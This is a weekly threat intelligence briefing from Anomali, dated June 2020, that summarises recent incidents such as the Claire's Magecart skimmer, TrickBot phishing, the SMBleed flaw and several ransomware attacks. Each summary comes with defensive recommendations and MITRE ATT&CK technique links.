June 16, 2020
-
Anomali Threat Research
,

Weekly Threat Briefing: APT Group, Microsoft Vulnerabilities, Ransomware, Spyware, and More

<div id="weekly"><p id="intro">The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics:<b> ActionSpy, APT, Data breach, Magecart, Ransomware, </b> and <b> Vulnerabilities</b>. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. <img src="https://cdn.filestackcontent.com/p2732wmGQm69bCbfv5Ur"/><br/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b></p><div id="trending-threats"><h2 id="trendingthreats">Trending Cyber News and Threat Intelligence</h2><h3 id="article-1" style="margin-bottom:0;"><a href="https://sansec.io/research/magecart-corona-lockdown" target="_blank"><b>Magecart Strikes Amid Corona Lockdown</b></a></h3><p>(published: June 15, 2020)</p><p>Security researchers at Sansec have identified how retail chain Claire’s Accessories had customer card data stolen. The day following Claire’s announcement to close all stores in response to the COVID-19 pandemic, a domain “claires-assets.com” was registered. During the last week in April, the online stores of Claire’s and its sister company, Icing, had malicious code injected into them that would exfiltrate customer information to the above mentioned server. Having gained write access to the store, through unknown means, the threat actors added the malicious code to the submit button of the checkout form. Appending the data to an image address, the threat actors are able to receive the payload, and may have a higher chance of going undetected since not all image requests will be monitored by security software.<br/> <b>Recommendation:</b> While it is not known how the threat actor gained access, it may have been through spearphishing, or stolen credentials. As a result, all employees should be educated on the risks of spearphishing and how to identify such attempts. Employees should also use different password for business-related accounts because actors will often test other accounts with previously stolen passwords. In addition, it is crucial that business accounts use a form of two-factor, or multi-factor authentication to make it difficult for actors to compromise accounts.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a> | <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link - T1192</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&amp;CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947133">[MITRE ATT&amp;CK] Custom Cryptographic Protocol - T1024</a><br/> <b>Tags:</b> Claires, COVID, Javascript, Magecart, Skimmer</p><h3 id="article-2" style="margin-bottom:0;"><a href="https://www.zdnet.com/article/knoxville-shuts-down-it-network-following-ransomware-attack/" target="_blank"><b>Knoxville Shuts Down IT Network Following Ransomware Attack</b></a></h3><p>(published: June 11, 2020)</p><p>The city of Knoxville, Tennessee has been the victim of a ransomware attack. Occurring on June 10, or 11 the city did not notice the attack until multiple systems had been encrypted by the ransomware. In response, the city disconnected the network from the internet, and the city court system were taken offline. The ransomware used in this attack is unknown, and it is currently unknown how the ransomware spread, with the FBI, currently investigating.<br/> <b>Recommendation:</b> Ransomware is a continually evolving threat. It is paramount to have a comprehensive and tested backup solution in place in addition to a business continuity policy in place. In the unfortunate case a reproducible backup is not in place, make sure to check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies who are doing their best to track these actors and prevent ransom from being a profitable business for threat actors.<br/> <b>Tags:</b> Ransomware, Knoxville, Data Encrypted for Impact</p><h3 id="article-3" style="margin-bottom:0;"><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/" target="_blank"><b>New Android Spyware ActionSpy Revealed via Phishing Attacks from Earth Empusa</b></a></h3><p>(published: June 11, 2020)</p><p>Trend Micro researchers have identified an Android malware targeting users in Tibet, Turkey, Taiwan, and Xinjiang. The malware, named “ActionSpy”, is spyware that steals information from the device and is used by the threat group Earth Empura who targets the Chinese minority Uyghurs. Earth Empusa utilizes phishing sites to invite users to download an Uyghur video application, Ekran, that instead downloads the ActionSpy malware. Imitating the Ekran app, the malware gains permission to the accessibility service which enables chat logs to be stolen from other applications, such as WeChat. The spyware has the ability to get location data, call logs, SMS messages, take photos, record audio among other features.<br/> <b>Recommendation:</b> Android users are advised to avoid third party downloads, instead to download from trusted sources such as the Google Play store. Always keep your device fully patched with the latest security updates.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947267">[MITRE ATT&amp;CK] Drive-by Compromise - T1189</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947195">[MITRE ATT&amp;CK] File and Directory Discovery - T1083</a> | <a href="https://ui.threatstream.com/ttp/947207">[MITRE ATT&amp;CK] Process Discovery - T1057</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery - T1082</a> | <a href="https://ui.threatstream.com/ttp/947187">[MITRE ATT&amp;CK] System Network Configuration Discovery - T1016</a> | <a href="https://ui.threatstream.com/ttp/947200">[MITRE ATT&amp;CK] System Network Connections Discovery - T1049</a> | <a href="https://ui.threatstream.com/ttp/947093">[MITRE ATT&amp;CK] Audio Capture - T1123</a> | <a href="https://ui.threatstream.com/ttp/947135">[MITRE ATT&amp;CK] Data from Local System - T1005</a> | <a href="https://ui.threatstream.com/ttp/947079">[MITRE ATT&amp;CK] Screen Capture - T1113</a> | <a href="https://ui.threatstream.com/ttp/947184">[MITRE ATT&amp;CK] Video Capture - T1125</a> | <a href="https://ui.threatstream.com/ttp/947266">[MITRE ATT&amp;CK] Data Encrypted - T1022</a> | <a href="https://ui.threatstream.com/ttp/947291">[MITRE ATT&amp;CK] Commonly Used Port - T1043</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a> | <a href="https://ui.threatstream.com/ttp/947150">[MITRE ATT&amp;CK] Standard Cryptographic Protocol - T1032</a><br/> <b>Tags:</b> ActionSpy, Android, Earth Empusa, Malware, Spyware, Uyghurs</p><h3 id="article-4" style="margin-bottom:0;"><a href="https://www.zdnet.com/article/hackers-breached-a1-telekom-austrias-largest-isp/" target="_blank"><b>Austria’s Largest ISP Admits to Data Breach after Expose</b></a></h3><p>(published: June 11, 2020)</p><p>This week a whistle-blower forced A1 Telekom, the largest Internet Service Provider (ISP) provider in Austria, to admit that it had suffered a significant security breach following a malware infection in November 2019. While not disclosing the nature of the infection, A1 said that the malware had lain undetected for a month while infecting their office network of approximately 15,000 workstations, 12,000 servers, and thousands more applications. The attacker then allegedly took control of the malware, attempting to run database queries leading to a 6-month clean-up by the A1 security team to remove backdoors. A1 stated that none of their customer data was compromised. The whistle-blower claims that the attack was carried out by APT 27 (Emissary Panda, Gallium), a Chinese APT known for targeting telecom providers.<br/> <b>Recommendation:</b> Malware authors are always innovating new methods of communicating back to the control servers. Always practice Defense in Depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe).<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a><br/> <b>Tags:</b> Telecomunications, data breach, Austria, APT 27, ISP, malware, backdoor</p><h3 id="article-5" style="margin-bottom:0;"><a href="https://www.bleepingcomputer.com/news/security/fake-black-lives-matter-voting-campaign-spreads-trickbot-malware/" target="_blank"><b>Fake Black Lives Matter Voting Campaign Spreads Trickbot Malware</b></a></h3><p>(published: June 10, 2020)</p><p>A spearphishing campaign is leveraging the Black Lives Matter (BLM) movement to distribute the information-stealer malware TrickBot. The BLM organization became a focal point in the world after the death of George Floyd in the U.S., and threat actors are exploiting the tragedy to act as a lure for their operations. The email asks users to vote anonymously about the BLM, once they open the document they will be asked to enable its content to view it properly. Once clicked on, an embedded macro will download the TrickBot trojan DLL onto target systems. TrickBot has the ability to download additional modules to steal active directory service databases, cookies, credentials saved in browsers, OpenSSH keys, PuTTY credentials, Remote Desktop Protocol (RDP) credentials, and Virtual Network Computing (VNC) credentials. TrickBot will also download a module to provide its lateral movement through a user's network to collect data. Threat actors operating TrickBot have also been seen to use several different ransomware payloads in their operations including Ryuk to encrypt user drives.<br/> <b>Recommendation:</b> Spearphishing is the most common type of threat facing targeted industries such as NGOs. All members of NGO organizations are susceptible to attack, and should all be educated on how to prevent phishing attacks. Email attachments should be treated as untrusted regardless of the sender's credibility. Detection and prevention measures should be taken to ensure that users do not fall victim to phishing. In the case of TrickBot compromise, the entire network should be scanned for infection, and an incident process should commence to identify the initial infection vector, as well as the scope of the compromise. Sophisticated, targeted attacks should be reported to the respective investigative government authorities.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947135">[MITRE ATT&amp;CK] Data from Local System - T1005</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947116">[MITRE ATT&amp;CK] Credentials in Registry - T1214</a> | <a href="https://ui.threatstream.com/ttp/2402531">[MITRE ATT&amp;CK] Data Encrypted for Impact - T1486</a> | <a href="https://ui.threatstream.com/ttp/3297571">[MITRE ATT&amp;CK] Credentials from Web Browsers - T1503</a> | <a href="https://ui.threatstream.com/ttp/3297610">[MITRE ATT&amp;CK] Steal Web Session Cookie - T1539</a><br/> <b>Tags:</b> TrickBot, Black Lives Matter, Information-Stealer, Spearphishing</p><h3 id="article-6" style="margin-bottom:0;"><a href="https://threatpost.com/thanos-ransomware-weaponize-riplace-tactic/156438/" target="_blank"><b>Thanos Ransomware First to Weaponize RIPlace Tactic</b></a></h3><p>(published: June 10, 2020)</p><p>Thanos ransomware-as-a-service (RaaS) tool increasingly popular in multiple underground forums, the first ransomware family to use the RIPlace tactic. RIPlace is a Windows file system technique used to maliciously alter files and which allows attackers to bypass various anti-ransomware methods.<br/> <b>Recommendation:</b> Ransomware can potentially be blocked by using endpoint protection solutions. Always keep your important files backed up. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/2402531">[MITRE ATT&amp;CK] Data Encrypted for Impact - T1486</a><br/> <b>Tags:</b> Ransomware RIPlace</p><h3 id="article-7" style="margin-bottom:0;"><a href="https://citizenlab.ca/2020/06/dark-basin-uncovering-a-massive-hack-for-hire-operation/" target="_blank"><b>Dark Basin: Uncovering a Massive Hack-For-Hire Operation</b></a></h3><p>(published: June 9, 2020)</p><p>Researchers at CitizenLab have released a report on a hacker-for-hire group called Dark Basin. The group has been linked to the Indian company BellTroX InfoTech Services and has been targeting banks, investment firms, corporate law firms, senior politicians, government prosecutors, CEOs, journalists, and human rights, defenders. According to CitizenLab, the group would send phishing emails to the target’s personal and professional email. In addition to direct targeting, the group would also target family members of the victim. In at least one case, a target’s minor child was sent phishing emails. After gaining access to the victim’s email account, the group used internal emails to target other users in the organization.<br/> <b>Recommendation:</b> Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defence mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff and robust threat intelligence capabilities.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link - T1192</a> | <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&amp;CK] Spearphishing via Service - T1194</a><br/> <b>Tags:</b> APT, espionage, Spearphishing</p><h3 id="article-8" style="margin-bottom:0;"><a href="https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/" target="_blank"><b>Honda and Enel Impacted By Cyber Attack Suspected To Be Ransomware</b></a></h3><p>(published: June 9, 2020)</p><p>On 8 June 2020, security researcher Vitali Kremez reported that two new samples of the Ekans ransomware have been uploaded to VirusTotal. Based on strings inside the malware samples, it was suspected that Honda Motor Company, Ltd and a subsidiary of Enel Group were the victims. It was later confirmed by Honda and Edesur, the affected subsidiary of Enel Group. The malware was first reported publicly in January 2020 and has been used by the threat actor since mid-December 2019. What makes the ransomware different from other strains is that it is being used to target manufacturers and ICS companies.<br/> <b>Recommendation:</b> Ransomware can potentially be blocked by using endpoint protection solutions. Always keep your important files backed up. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/2402531">[MITRE ATT&amp;CK] Data Encrypted for Impact - T1486</a><br/> <b>Tags:</b> ekans, snake, ransomware</p><h3 id="article-9" style="margin-bottom:0;"><a href="https://thehackernews.com/2020/06/SMBleed-smb-vulnerability.html" target="_blank"><b>SMBleed: A New Critical Vulnerability Affects Windows SMB Protocol</b></a></h3><p>(published: June 9, 2020)</p><p>Security researchers at ZecOps have discovered a new and critical vulnerability that affects the Server Message Block (SMB) protocol. This flaw could allow attackers to leak kernel memory remotely and this exploit can be chained with a previous vulnerability, SMBGhost, to achieve remote code execution. The SMBleed vulnerability resides in SMB’s decompression function in the srv2.sys server driver. According to Microsoft, successful exploitation of this vulnerability requires a connection from the user to an attacker owned malicious SMB V3 server. The SMBleed vulnerability affects Windows 10 versions 1903,1909 and 2004 before KB4557957 and patches for SMBleed were made available as part June 2020 Patch Tuesday by Microsoft.<br/> <b>Recommendation:</b> Ensure endpoints are secure with updated patches; also make sure users have only standard user accounts and not privileged ones, and use endpoint antimalware tools to protect the devices. These steps need to be completed using a defense-in-depth approach by scanning network connections and email for malware. This will help reduce the chance that the malware will be able to get on the endpoint and execute.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947217">[MITRE ATT&amp;CK] Exploitation of Remote Services - T1210</a><br/> <b>Tags:</b> Exploit, SMB, Wormable, CVE-2020-0796, SMBleed</p><h3 id="article-10" style="margin-bottom:0;"><a href="https://news.sophos.com/en-us/2020/06/09/kingminer-report/" target="_blank"><b>Kingminer Escalates Attack Complexity For Cryptomining</b></a></h3><p>(published: June 9, 2020)</p><p>Researchers from Sophos have released a report on a new variant of the KingMiner malware that targets Microsoft SQL servers. KingMiner is a malware that was originally discovered by Checkpoint in November 2018. The report discusses recent changes in tactics, techniques, and procedures used by the threat group. The attackers use brute force techniques to gain initial access to the MSSQL server and install XMRig cryptocurrency mining software. The group has evolved over time by adding new features such as usage of Domain Generation Algorithm (DGA) for payload delivery, incorporated exploits “CVE-2017-0213” or “CVE-2019-0803” for privilege escalation attempts and DLL sideloading. The group prefers to use customized versions of popular open-source tools such as PowerSploit, mimikatz in their operation.<br/> <b>Recommendation:</b> Limit the exposure of MSSQLserver to the internet unless it is business critical, and monitor the logon activity for any suspicious login attempts. Security updates for all software used by your company should be properly reviewed and applied as soon as possible to assist in avoiding potential malicious activity. Cryptocurrency miners cause a high CPU usage, therefore, if fans seem to be always running on a machine, the activity/task manager should be checked to see if suspicious software, potentially miners, are running unknowingly.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force - T1110</a> | <a href="https://ui.threatstream.com/ttp/947232">[MITRE ATT&amp;CK] DLL Side-Loading - T1073</a> | <a href="https://ui.threatstream.com/ttp/2402536">[MITRE ATT&amp;CK] Domain Generation Algorithms - T1483</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a><br/> <b>Tags:</b> Kingminer, Cryptominer, SQL, Privilege Escalation, DLL side loading, Botnet, Brute Force</p><h3 id="article-11" style="margin-bottom:0;"><a href="https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Jun" target="_blank"><b>Microsoft Releases June 2020 Security Patches For 129 Vulnerabilities</b></a></h3><p>(published: June 9, 2020)</p><p>Microsoft has released updates to address multiple vulnerabilities in Microsoft products and software. An attacker could exploit some of these vulnerabilities to take control of an affected system. effected software include Microsoft Windows, Microsoft Edge (Edge HTML-based), Microsoft Edge (Chromium-based) in IE Mode, Microsoft ChakraCore, Internet Explorer, Microsoft Office, and Microsoft Office Services and Web Apps, Windows Defender, Microsoft Dynamics, Visual Studio, Azure DevOps, HoloLens, Adobe Flash Player, Microsoft Apps for Android, Windows App Store, System Center, Android App.<br/> <b>Recommendation:</b> Apply patches KB 4560960, 4561608, 4561616, 4561643, 4561645, 4561669, 4561670 and make sure all affected software is up to date.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947217">[MITRE ATT&amp;CK] Exploitation of Remote Services - T1210</a><br/> <b>Tags:</b> CVE-2020-1148, CVE-2020-1160, CVE-2020-1163, CVE-2020-1170, CVE-2020-1177 CVE-2020-1178 CVE-2020-1181 CVE-2020-1183 CVE-2020-1206 CVE-2020-1217 CVE-2020-1220 CVE-2020-1223 CVE-2020-1225 CVE-2020-1226 CVE-2020-1229 CVE-2020-1232 CVE-2020-1242 CVE-2020-1261 CVE-2020-1263 CVE-2020-1268 CVE-2020-1284 CVE-2020-1289 CVE-2020-1290 CVE-2020-1295 CVE-2020-1296 CVE-2020-1297 CVE-2020-1298 CVE-2020-1315 CVE-2020-1301 CVE-2020-1318 CVE-2020-1320 CVE-2020-1321 CVE-2020-1322 CVE-2020-1323 CVE-2020-1329, Vulnerabilty, Patch Tuesday</p></div></div>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.